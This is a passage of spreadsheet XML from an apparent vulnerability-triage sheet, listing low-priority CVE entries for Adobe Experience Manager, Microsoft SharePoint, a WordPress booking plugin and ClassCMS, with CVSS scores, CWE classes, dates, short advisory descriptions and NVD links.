s="5" t="inlineStr" /><c r="J1348" s="5" t="inlineStr" /><c r="K1348" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1348" s="5" t="inlineStr" /><c r="M1348" s="5" t="inlineStr" /><c r="N1348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1348" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1348" s="5" t="inlineStr" /><c r="R1348" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t></is></c></row><row r="1349"><c r="A1349" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1349" s="5" t="inlineStr"><is><t>CVE-2025-64838</t></is></c><c r="D1349" s="5" t="n"><v>5.4</v></c><c r="E1349" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1349" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1349" s="5" t="inlineStr" /><c r="H1349" s="5" t="n"><v>0.003</v></c><c r="I1349" s="5" t="inlineStr" /><c r="J1349" s="5" t="inlineStr" /><c r="K1349" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1349" s="5" t="inlineStr" /><c r="M1349" s="5" t="inlineStr" /><c r="N1349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1349" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1349" s="5" t="inlineStr" /><c r="R1349" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1349"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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t></is></c></row><row r="1350"><c r="A1350" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1350" s="5" t="inlineStr"><is><t>CVE-2025-64854</t></is></c><c r="D1350" s="5" t="n"><v>5.4</v></c><c r="E1350" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1350" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1350" s="5" t="inlineStr" /><c r="H1350" s="5" t="n"><v>0.003</v></c><c r="I1350" s="5" t="inlineStr" /><c r="J1350" s="5" t="inlineStr" /><c r="K1350" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1350" s="5" t="inlineStr" /><c r="M1350" s="5" t="inlineStr" /><c r="N1350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1350" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1350" s="5" t="inlineStr" /><c r="R1350" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1350"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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t></is></c></row><row r="1351"><c r="A1351" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1351" s="5" t="inlineStr"><is><t>CVE-2025-64866</t></is></c><c r="D1351" s="5" t="n"><v>5.4</v></c><c r="E1351" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1351" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1351" s="5" t="inlineStr" /><c r="H1351" s="5" t="n"><v>0.003</v></c><c r="I1351" s="5" t="inlineStr" /><c r="J1351" s="5" t="inlineStr" /><c r="K1351" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1351" s="5" t="inlineStr" /><c r="M1351" s="5" t="inlineStr" /><c r="N1351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1351" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1351" s="5" t="inlineStr" /><c r="R1351" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1351"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t></is></c></row><row r="1352"><c r="A1352" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1352" s="5" t="inlineStr"><is><t>CVE-2025-64868</t></is></c><c r="D1352" s="5" t="n"><v>5.4</v></c><c r="E1352" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1352" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1352" s="5" t="inlineStr" /><c r="H1352" s="5" t="n"><v>0.003</v></c><c r="I1352" s="5" t="inlineStr" /><c r="J1352" s="5" t="inlineStr" /><c r="K1352" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1352" s="5" t="inlineStr" /><c r="M1352" s="5" t="inlineStr" /><c r="N1352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1352" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1352" s="5" t="inlineStr" /><c r="R1352" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1352"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t></is></c></row><row r="1353"><c r="A1353" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1353" s="5" t="inlineStr"><is><t>CVE-2026-19479</t></is></c><c r="D1353" s="5" t="n"><v>5.4</v></c><c r="E1353" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1353" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1353" s="5" t="inlineStr" /><c r="H1353" s="5" t="n"><v>0.003</v></c><c r="I1353" s="5" t="inlineStr" /><c r="J1353" s="5" t="inlineStr" /><c r="K1353" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1353" s="5" t="inlineStr" /><c r="M1353" s="5" t="inlineStr" /><c r="N1353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1353" s="5" t="inlineStr" /><c r="R1353" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t></is></c></row><row r="1354"><c r="A1354" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1354" s="5" t="inlineStr"><is><t>CVE-2026-19612</t></is></c><c r="D1354" s="5" t="n"><v>5.4</v></c><c r="E1354" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1354" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1354" s="5" t="inlineStr" /><c r="H1354" s="5" t="n"><v>0.003</v></c><c r="I1354" s="5" t="inlineStr" /><c r="J1354" s="5" t="inlineStr" /><c r="K1354" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1354" s="5" t="inlineStr" /><c r="M1354" s="5" t="inlineStr" /><c r="N1354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1354" s="5" t="inlineStr" /><c r="R1354" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t></is></c></row><row r="1355"><c r="A1355" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1355" s="5" t="inlineStr"><is><t>CVE-2026-19644</t></is></c><c r="D1355" s="5" t="n"><v>5.4</v></c><c r="E1355" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1355" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1355" s="5" t="inlineStr" /><c r="H1355" s="5" t="n"><v>0.003</v></c><c r="I1355" s="5" t="inlineStr" /><c r="J1355" s="5" t="inlineStr" /><c r="K1355" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1355" s="5" t="inlineStr" /><c r="M1355" s="5" t="inlineStr" /><c r="N1355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1355" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1355" s="5" t="inlineStr" /><c r="R1355" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t></is></c></row><row r="1356"><c r="A1356" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1356" s="5" t="inlineStr"><is><t>CVE-2026-19713</t></is></c><c r="D1356" s="5" t="n"><v>5.4</v></c><c r="E1356" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1356" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1356" s="5" t="inlineStr" /><c r="H1356" s="5" t="n"><v>0.003</v></c><c r="I1356" s="5" t="inlineStr" /><c r="J1356" s="5" t="inlineStr" /><c r="K1356" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1356" s="5" t="inlineStr" /><c r="M1356" s="5" t="inlineStr" /><c r="N1356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1356" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1356" s="5" t="inlineStr" /><c r="R1356" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t></is></c></row><row r="1357"><c r="A1357" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1357" s="5" t="inlineStr"><is><t>CVE-2026-2520</t></is></c><c r="D1357" s="5" t="n"><v>5.4</v></c><c r="E1357" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1357" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1357" s="5" t="inlineStr" /><c r="H1357" s="5" t="n"><v>0.002</v></c><c r="I1357" s="5" t="inlineStr" /><c r="J1357" s="5" t="inlineStr" /><c r="K1357" s="5" t="inlineStr" /><c r="L1357" s="5" t="inlineStr" /><c r="M1357" s="5" t="inlineStr" /><c r="N1357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1357" s="5" t="inlineStr" /><c r="R1357" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1357" s="5" t="inlineStr"><is><t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'updateAddon' function in all versions up to, and including, 27.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update any plugin with a main file of 'main.php' to its latest version.</t></is></c><c r="T1357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-2520</t></is></c></row><row r="1358"><c r="A1358" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1358" s="5" t="inlineStr"><is><t>CVE-2026-27227</t></is></c><c r="D1358" s="5" t="n"><v>5.4</v></c><c r="E1358" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1358" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1358" s="5" t="inlineStr" /><c r="H1358" s="5" t="n"><v>0.003</v></c><c r="I1358" s="5" t="inlineStr" /><c r="J1358" s="5" t="inlineStr" /><c r="K1358" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1358" s="5" t="inlineStr" /><c r="M1358" s="5" t="inlineStr" /><c r="N1358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1358" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1358" s="5" t="inlineStr" /><c r="R1358" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t></is></c></row><row r="1359"><c r="A1359" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1359" s="5" t="inlineStr"><is><t>CVE-2026-52307</t></is></c><c r="D1359" s="5" t="n"><v>5.4</v></c><c r="E1359" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1359" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1359" s="5" t="inlineStr" /><c r="H1359" s="5" t="n"><v>0.003</v></c><c r="I1359" s="5" t="inlineStr" /><c r="J1359" s="5" t="inlineStr" /><c r="K1359" s="5" t="inlineStr" /><c r="L1359" s="5" t="inlineStr" /><c r="M1359" s="5" t="inlineStr" /><c r="N1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1359" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1359" s="5" t="inlineStr" /><c r="R1359" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1359" s="5" t="inlineStr"><is><t>An authenticated stored cross-site scripting (XSS) vulnerability in the Column Management component of ClassCMS 1CMS v5.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the title field.</t></is></c><c r="T1359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52307</t></is></c></row><row r="1360"><c r="A1360" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1360" s="5" t="inlineStr"><is><t>CVE-2026-69402</t></is></c><c r="D1360" s="5" t="n"><v>5.4</v></c><c r="E1360" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1360" s="5" t="inlineStr" /><c r="H1360" s="5" t="n"><v>0.004</v></c><c r="I1360" s="5" t="inlineStr" /><c r="J1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1360" s="5" t="inlineStr" /><c r="M1360" s="5" t="inlineStr" /><c r="N1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1360" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1360" s="5" t="inlineStr" /><c r="R1360" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1360" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t></is></c></row><row r="1361"><c r="A1361" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1361" s="5" t="inlineStr"><is><t>CVE-2026-69417</t></is></c><c r="D1361" s="5" t="n"><v>5.4</v></c><c r="E1361" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1361" s="5" t="inlineStr" /><c r="H1361" s="5" t="n"><v>0.004</v></c><c r="I1361" s="5" t="inlineStr" /><c r="J1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1361" s="5" t="inlineStr" /><c r="M1361" s="5" t="inlineStr" /><c r="N1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1361" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1361" s="5" t="inlineStr" /><c r="R1361" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1361" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t></is></c></row><row r="1362"><c r="A1362" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1362" s="5" t="inlineStr"><is><t>CVE-2026-69690</t></is></c><c r="D1362" s="5" t="n"><v>5.4</v></c><c r="E1362" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1362" s="5" t="inlineStr" /><c r="H1362" s="5" t="n"><v>0.004</v></c><c r="I1362" s="5" t="inlineStr" /><c r="J1362" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1362" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1362" s="5" t="inlineStr" /><c r="M1362" s="5" t="inlineStr" /><c r="N1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1362" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1362" s="5" t="inlineStr" /><c r="R1362" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1362" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t></is></c></row><row r="1363"><c r="A1363" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1363" s="5" t="inlineStr"><is><t>CVE-2026-71356</t></is></c><c r="D1363" s="5" t="n"><v>5.4</v></c><c r="E1363" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1363" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1363" s="5" t="inlineStr" /><c r="H1363" s="5" t="n"><v>0.003</v></c><c r="I1363" s="5" t="inlineStr" /><c r="J1363" s="5" t="inlineStr" /><c r="K1363" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1363" s="5" t="inlineStr" /><c r="M1363" s="5" t="inlineStr" /><c r="N1363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1363" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1363" s="5" t="inlineStr" /><c r="R1363" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t></is></c></row><row r="1364"><c r="A1364" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1364" s="5" t="inlineStr"><is><t>CVE-2026-71357</t></is></c><c r="D1364" s="5" t="n"><v>5.4</v></c><c r="E1364" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1364" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1364" s="5" t="inlineStr" /><c r="H1364" s="5" t="n"><v>0.003</v></c><c r="I1364" s="5" t="inlineStr" /><c r="J1364" s="5" t="inlineStr" /><c r="K1364" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1364" s="5" t="inlineStr" /><c r="M1364" s="5" t="inlineStr" /><c r="N1364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1364" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1364" s="5" t="inlineStr" /><c r="R1364" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t></is></c></row><row r="1365"><c r="A1365" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1365" s="5" t="inlineStr"><is><t>CVE-2026-71388</t></is></c><c r="D1365" s="5" t="n"><v>5.4</v></c><c r="E1365" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1365" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1365" s="5" t="inlineStr" /><c r="H1365" s="5" t="n"><v>0.003</v></c><c r="I1365" s="5" t="inlineStr" /><c r="J1365" s="5" t="inlineStr" /><c r="K1365" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1365" s="5" t="inlineStr" /><c r="M1365" s="5" t="inlineStr" /><c r="N1365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1365" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1365" s="5" t="inlineStr" /><c r="R1365" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t></is></c></row><row r="1366"><c r="A1366" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1366" s="5" t="inlineStr"><is><t>CVE-2026-71440</t></is></c><c r="D1366" s="5" t="n"><v>5.4</v></c><c r="E1366" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1366" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1366" s="5" t="inlineStr" /><c r="H1366" s="5" t="n"><v>0.002</v></c><c r="I1366" s="5" t="inlineStr" /><c r="J1366" s="5" t="inlineStr" /><c r="K1366" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1366" s="5" t="inlineStr" /><c r="M1366" s="5" t="inlineStr" /><c r="N1366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1366" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1366" s="5" t="inlineStr" /><c r="R1366" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t></is></c></row><row r="1367"><c r="A1367" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1367" s="5" t="inlineStr"><is><t>CVE-2026-71565</t></is></c><c r="D1367" s="5" t="n"><v>5.4</v></c><c r="E1367" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1367" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1367" s="5" t="inlineStr" /><c r="H1367" s="5" t="n"><v>0.002</v></c><c r="I1367" s="5" t="inlineStr" /><c r="J1367" s="5" t="inlineStr" /><c r="K1367" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1367" s="5" t="inlineStr" /><c r="M1367" s="5" t="inlineStr" /><c r="N1367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1367" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1367" s="5" t="inlineStr" /><c r="R1367" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t></is></c></row><row r="1368"><c r="A1368" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1368" s="5" t="inlineStr"><is><t>CVE-2026-72626</t></is></c><c r="D1368" s="5" t="n"><v>5.4</v></c><c r="E1368" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1368" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1368" s="5" t="inlineStr" /><c r="H1368" s="5" t="n"><v>0.002</v></c><c r="I1368" s="5" t="inlineStr" /><c r="J1368" s="5" t="inlineStr" /><c r="K1368" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1368" s="5" t="inlineStr" /><c r="M1368" s="5" t="inlineStr" /><c r="N1368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1368" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1368" s="5" t="inlineStr" /><c r="R1368" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t></is></c></row><row r="1369"><c r="A1369" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1369" s="5" t="inlineStr"><is><t>CVE-2026-72627</t></is></c><c r="D1369" s="5" t="n"><v>5.4</v></c><c r="E1369" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1369" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1369" s="5" t="inlineStr" /><c r="H1369" s="5" t="n"><v>0.002</v></c><c r="I1369" s="5" t="inlineStr" /><c r="J1369" s="5" t="inlineStr" /><c r="K1369" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1369" s="5" t="inlineStr" /><c r="M1369" s="5" t="inlineStr" /><c r="N1369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1369" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1369" s="5" t="inlineStr" /><c r="R1369" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t></is></c></row><row r="1370"><c r="A1370" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1370" s="5" t="inlineStr"><is><t>CVE-2026-75629</t></is></c><c r="D1370" s="5" t="n"><v>5.4</v></c><c r="E1370" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1370" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1370" s="5" t="inlineStr" /><c r="H1370" s="5" t="n"><v>0.002</v></c><c r="I1370" s="5" t="inlineStr" /><c r="J1370" s="5" t="inlineStr" /><c r="K1370" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1370" s="5" t="inlineStr" /><c r="M1370" s="5" t="inlineStr" /><c r="N1370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1370" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1370" s="5" t="inlineStr" /><c r="R1370" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t></is></c></row><row r="1371"><c r="A1371" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1371" s="5" t="inlineStr"><is><t>CVE-2026-75635</t></is></c><c r="D1371" s="5" t="n"><v>5.4</v></c><c r="E1371" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1371" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1371" s="5" t="inlineStr" /><c r="H1371" s="5" t="n"><v>0.002</v></c><c r="I1371" s="5" t="inlineStr" /><c r="J1371" s="5" t="inlineStr" /><c r="K1371" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1371" s="5" t="inlineStr" /><c 